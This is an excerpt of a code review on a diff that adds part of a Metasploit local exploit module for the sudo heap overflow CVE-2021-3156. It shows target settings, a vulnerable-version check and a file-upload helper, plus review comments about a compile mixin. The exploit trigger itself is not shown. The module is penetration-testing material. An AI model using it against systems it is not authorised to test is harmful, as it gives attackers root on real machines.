modules/exploits/linux/local/cve_2021_3156_sudo.rb

```diff
@@ -0,0 +1,158 @@
+          ],
+        'SessionTypes'   => ['shell', 'meterpreter'],
+        'Platform'       => ['unix', 'linux'],
+        'References'     => [
+          ['URL', 'https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit'],
+          ['URL', 'https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt'],
+          ['URL', 'https://www.kalmarunionen.dk/writeups/sudo/'],
+          ['URL', 'https://github.com/blasty/CVE-2021-3156/blob/main/hax.c'],
+          ['CVE', '2021-3156'],
+        ],
+        'Targets'        =>
+          [
+            [ 'Manual', { } ],
+            [ 'Ubuntu 20.04.1 x64 (sudo v1.8.31, libc v2.31)', { lengths: [ 56, 54, 63, 200 ] } ],
+          ],
+        'DefaultTarget'  => 1,
+        'Arch'           => ARCH_X64,
+        'DefaultOptions' => { 'WfsDelay' => 10 },
+        'DisclosureDate' => '2021-01-26',
+        'Notes' => {
+          'AKA'         => [ 'Baron Samedit' ],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])
+      ], self.class
+    )
+
+    register_advanced_options(
+      [
+        OptString.new('Lengths', [ false, 'The lengths to set as used by the manual target. (format: #,#,#,#)' ], regex: /(\d+(,[ ]*| )){3}\d+/)
+      ]
+    )
+  end
+
+  def get_versions
+    versions = {}
+    output = cmd_exec("sudo --version")
+    if output
+      version = output.split("\n").first.split(' ').last
+      versions[:sudo] = version if version =~ /^\d/
+    end
+
+    # this libc version check will need to be updated to support non-linux targets like OSX
+    output = cmd_exec("ldd --version")
+    if output
+      version = output.split("\n").first.split(' ').last
+      versions[:libc] = version if version =~ /^\d/
+    end
+
+    versions
+  end
+
+  def check
+    sudo_version = get_versions[:sudo]
+    return CheckCode::Unknown('Could not identify the version of sudo.') if sudo_version.nil?
+
+    # fixup the p number used by sudo to be compatible with Gem::Version
+    sudo_version.gsub!(/p/, '.')
+
+    vuln_builds = [
+      [Gem::Version.new('1.8.2'), Gem::Version.new('1.8.31.2')],
+      [Gem::Version.new('1.9.0'), Gem::Version.new('1.9.5.1')],
+    ]
+
+    if vuln_builds.any? { |build_range| Gem::Version.new(sudo_version).between?(*build_range) }
+      return CheckCode::Appears("sudo #{sudo_version} is a vulnerable build.")
+    end
+
+    CheckCode::Safe("sudo #{sudo_version} is not a vulnerable build.")
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    write_file path, data
+  end
+
+  def upload_and_compile(path, data)
```

Comment:
Fyi there is a mixin for this already: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/post/linux/compile.rb#L30

Reply:
The mixin options will need to be deregistered and the compile option overridden to force upload as there's no pre-compiled executable for this module.